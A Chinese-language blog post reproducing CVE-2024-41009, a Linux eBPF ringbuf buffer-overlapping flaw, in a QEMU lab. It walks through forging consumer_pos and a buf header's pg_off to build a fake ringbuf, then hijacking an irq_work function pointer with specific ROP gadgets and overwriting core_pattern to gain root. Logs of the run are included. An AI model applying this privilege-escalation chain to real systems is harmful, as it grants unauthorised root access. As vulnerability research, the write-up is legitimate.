内核提权CVE-2024-41009复现分析

2025/04/13 kernel-exploit 共 7696 字,约 22 分钟

CVE-2024-41009 是eBPF ringbuf map 模块一个Buffer overlapping问题,可以利用来提权。内核版本从v5.8 到 v6.9存在这个问题。ringbuf在内核和用户空间之间建立起共享内存,经典的生产者消费者模型。内核做生产者时,内核内由eBPF写入共享内存,用户空间作为消费者读取共享内存。问题出现在用户空间做消费者模式中,bpf ringbuf map在内核内有结构struct bpf_ringbuf表示,consumer_pos字段用户空间可写的,内核在使用时没有做到很好的检查,从而导致同一段内存可以同时属于两块不同的buf。

漏洞原理

看一下bpf_ringbuf内存布局: consumer_pos,producer_pos,data都是页对齐的,这样bpf_ringbuf->consumer_pos前的部分占到一页,consumer_pos占一页,prdoucer_pospending_pos占一页,再后面才是数据区。

16K大小的ringbuf,实际会用到7个page(page1 consumer_pos 前,page2 consumer_pospage3 producer_pos,data 4页16K)。consumer_pos这一页可以写方式映射mmap(ringbuf_map_mmap_kern)到用户空间。

struct bpf_ringbuf {
    wait_queue_head_t waitq;
    struct irq_work work;
    u64 mask;
    struct page **pages;
    int nr_pages;
    spinlock_t spinlock ____cacheline_aligned_in_smp;
    atomic_t busy ____cacheline_aligned_in_smp;
    unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
    unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
    unsigned long pending_pos;
    char data[] __aligned(PAGE_SIZE);
};
  • work - 含有函数指针func, ringbuf释放时调用
  • consumer_pos - 标记读取位置,可以单独mapping到用户空间,由于mmap是对内存区进行操作(即VMA),而内存区是页对齐的,虽然这个字段只有8字节,却占了一个整页
  • data - 数据区

buf从data部分分配,每个buf的header部分8字节是bpf_ringbuf_hdr,eBPF和用户空间都是不能直接修改的,分配时这部分被跳过return (void *)hdr + BPF_RINGBUF_HDR_SZ,

struct bpf_ringbuf_hdr {
    u32 len;
    u32 pg_off;
};

data 部分page做了两次映射,虚拟地址的后一半和前一半都指向相同的物理页。

bpf_ringbuf_area_alloc
 /* Each data page is mapped twice to allow "virtual"
     * continuous read of samples wrapping around the end of ring
     * buffer area:
     * ------------------------------------------------------
     * | meta pages |  real data pages  |  same data pages  |
     * ------------------------------------------------------
     * |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
     * ------------------------------------------------------
     * |            | TA             DA | TA             DA |
     * ------------------------------------------------------
     *                               ^^^^^^^
     *                                  |
     * Here, no need to worry about special handling of wrapped-around
     * data due to double-mapped data pages. This works both in kernel and
     * when mmap()'ed in user-space, simplifying both kernel and
     * user-space implementations significantly.
     */
    array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
    pages = bpf_map_area_alloc(array_size, numa_node);
    if (!pages)
        return NULL;

    for (i = 0; i < nr_pages; i++) {
        page = alloc_pages_node(numa_node, flags, 0);
        if (!page) {
            nr_pages = i;
            goto err_free_pages;
        }
        pages[i] = page;
        if (i >= nr_meta_pages)
            pages[nr_data_pages + i] = page;
    }

    rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
          VM_MAP | VM_USERMAP, PAGE_KERNEL);
    if (rb) {
        kmemleak_not_leak(pages);
        rb->pages = pages;
        rb->nr_pages = nr_pages;
        return rb;
    }

复现利用过程

总结起来,整个利用过程是:

  • 篡改consumer_pos
  • eBPF分配出overlapping 内存
  • 利用overlapping篡改buf hdr pg_off字段
  • 释放buf,从pg_off得到fake bpf_ringbuf
  • 执行fake func
  • 篡改core_pattern
  • 主动crash,触发core_dump执行任意命令
  • 拿到flag及root bash

用户态篡改consumer_pos

创建大小16K的ringbuf, 将consumer_pos页映射到用户空间,修改成0x3000; 通过eBPF分配两个0x3000大小的buf, 因为总大小只有0x4000, 正常第二次会失败。但由于已经将consumer_pos修改成了0x3000, 检查会被绕过:

__bpf_ringbuf_reserve
    if (new_prod_pos - cons_pos > rb->mask) {
        spin_unlock_irqrestore(&rb->spinlock, flags);
        return NULL;
    }

分配出overlapping 内存块

buf大小选择16K,nr_meta_pages = 4, 这样[0, 0x1000] 与 [0x4000, 0x5000]是同一个page, 0x4000指向了chunk A’s hdr 分配出A - [0, 0x3008], B - [0x3008, 0x6010], eBPF可以访问[0x3010, 0x6010], 通过B’s 0x4000可以修改A的hdr meta数据。buf回收时,bpf_ringbuf_restore_from_rec根据hdr的pg_off计算ringbuf的地址。

    bpf_ringbuf_discard
        bpf_ringbuf_commit
           struct buf_ringbuf *rb = bpf_ringbuf_restore_from_rec(hdr);
                    unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
                    return (void*)((addr & PAGE_MASK) - off);
        

通过第二块buf,篡改第一块buf的hdr->len

从上面ringbuf的内存布局知道,第一块buf也就是data到consumer_pos相差的页是2个,到到这里可以将第一块buf的hdr->pg_off改写成2,这样在bpf_ringbuf_commit函数中,从buf的hdr计算ringbuf时,计算出的ringbug就是用户空间完全控制的内存 - consumer_pos内存页。consumer_pos这页内存就充当了fake bpf_ringbuf。

再看struct bpf_ringbuf结构,含有一个irq_work的结构work,其中func是一个函数指针。只要将fake bpf_ringbuf的func改成ROP就可以执行任意代码。

 struct irq_work {
    struct __call_single_node node;
    void (*func)(struct irq_work *);
    struct rcuwait irqwait;
};

ROP构造

func在bpf_ringbuf结构的0x28偏移处,前面已将ringbuf调整到consumer_pos处,只要将consumer_pos+0x28设置成stack pivot ROP, 当func执行到时,就可以运行ROP控制执行流。

我在自己编译的vmlinux中没有找到像原POC中那么理想的stack pivot ROP push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret

在func执行时irq_work_queue(&rb->work), rbx/rdi都是work的地址,也就是ringbuf+0x18

(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work)
$2 = 0x18

stack pivot rop 未找到rsp设置成功后避开+0x20的rop,只找到0xffffffff8225c149,这个gadget执行完后,rsp调整到0x20处。

 0xffffffff8225c149 <inet_diag_msg_common_fill+105>:  push   %rbx
   0xffffffff8225c14a <inet_diag_msg_common_fill+106>:  and    %bl,0x41(%rbx)
   0xffffffff8225c14d <inet_diag_msg_common_fill+109>:  pop    %rsp
   0xffffffff8225c14e <inet_diag_msg_common_fill+110>:  pop    %rbp
   0xffffffff8225c14f <inet_diag_msg_common_fill+111>:  ret

+0x20处设置为别的gadget后发现不能触发,+0x20处是bpf_ringbuf.work.node.a_flags, 此处设为0xffff时,没有触发bug,既无crash也未成功,设置为0xff22时,panic报出异常地址0xff22, 这说明最低位设为0x22可绕过, 实际上irq_work_claim有flag检查 if (oflags & IRQ_WORK_PENDING), 选择地址地末位是0x22的rop - 0xffffffff820df722:
pop r13, pop r14, pop rbp, ret

(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work.node.a_flags)
$4 = 0x20
0x22 == CSD_TYPE_IRQ_WORK(0x20) | IRQ_WORK_BUSY (0x02);
IRQ_WORK_PENDING = 0x1

接下来通过ROP修改core_pattern值为memfd |/proc/%P/fd/666 %P,并将memfd复制为利用程序自身,完成之后利用程序主动crash,触发coredump产生,内核已root权限运行exploit程序自身,完成提权。

复现:

所有的rop必须在[_stext, _etext]之间,否则会触发NX错误:

81.766165] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[   81.792896] BUG: unable to handle page fault for address: ffffffff8299a052
[   81.810767] #PF: supervisor instruction fetch in kernel mode
[   81.823853] #PF: error_code(0x0011) - permissions violation
ts[0[  ] 81:. 853,6 socket248] PGD 3c46067 P4D 3c46067 PUD 3c47063 PMD 80000000028001e1
[   81.851043] Oops: 0011 [#1] PREEMPT SMP PTI

test:

$ ./poc
Hello World!
try to wait core
[   95.464768] BUG: scheduling while atomic: poc/354/0x00010002
[   95.478632] Modules linked in:

sock[   95.486469] Preemption disabled at:
[   95.486474] [<ffffffff81310e23>] irq_work_queue+0x23/0x50
ets[0]: 5, socke[   95.508029] CPU: 1 PID: 354 Comm: poc Not tainted 6.3.0 #93
[   95.526632] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
t[1]: 6
[   95.599172] Call Trace:
[   95.677927] ------------[ cut here ]------------
[   95.683175] Voluntary context switch within RCU read-side critical section!
[   95.683816] WARNING: CPU: 1 PID: 354 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x62c/0x690
[   95.713178] Modules linked in:
[   95.718262] CPU: 1 PID: 354 Comm: poc Tainted: G        W          6.3.0 #93
[   95.735521] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   95.752900] RIP: 0010:rcu_note_context_switch+0x62c/0x690
[   95.762138] Code: 00 00 00 00 0f 85 0d fd ff ff 49 89 8c 24 a0 00 00 00 e9 00 fd ff ff 48 c7 c7 a8 24 27 83 c6 05 75 08 ce 02 01 e8 a4 82 f6 ff <0f> 0b e9 3b fa ff ff 49 83 bc 24 98 00 00 00 00 49 8b 84 24 a0 00
[   95.793147] RSP: 0018:ffffc900009adf40 EFLAGS: 00010086
[   95.801582] RAX: 0000000000000000 RBX: ffff88813bcb3700 RCX: 0000000000000000
[   95.814821] RDX: 0000000000000003 RSI: 0000000000000027 RDI: 00000000ffffffff
[   95.828898] RBP: 0000000000000000 R08: 00000000ffffdfff R09: 0000000000000001
[   95.840645] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88813bcb2880
[   95.854500] R13: ffff888102acb240 R14: 0000000000000000 R15: 0000000000000000
[   95.871507] FS:  0000000000da2380(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[   95.890278] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   95.901485] CR2: 00000000004b9000 CR3: 0000000102a02000 CR4: 0000000000050ee0
[   95.918447] Call Trace:
[   95.925747] ---[ end trace 0000000000000000 ]---
[   96.027876] poc[355]: segfault at 0 ip 000000000040248d sp 00007ffc781827d0 error 6 in poc[401000+89000] likely on CPU 1 (core 1, socket 0)
[   96.075993] Code: df e8 97 fb 01 00 ba 10 00 00 00 4c 89 ee 48 89 ef e8 47 ec ff ff 85 c0 0f 85 4f ff ff ff 48 8d 3d d6 7b 08 00 e8 03 46 00 00 <48> c7 04 25 00 00 00 00 00 00 00 00 0f 0b 0f 1f 44 00 00 f3 0f 1e
check core: /proc/sys/kernel/core_pattern
Root shell !!
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/#
root@wintermute:/# whoami
root

环境

kernel version using
6.3 commit 457391b0380335d5e9a5babdec90ac53928b23b4
步骤:buf-overlapping -> buf metadata -> ringbuf meta -> function pointer -> stack pivot -> ROP

全部复现文件 传送门

参考资料

2024-41009-poc

文档信息

Search

    Table of Contents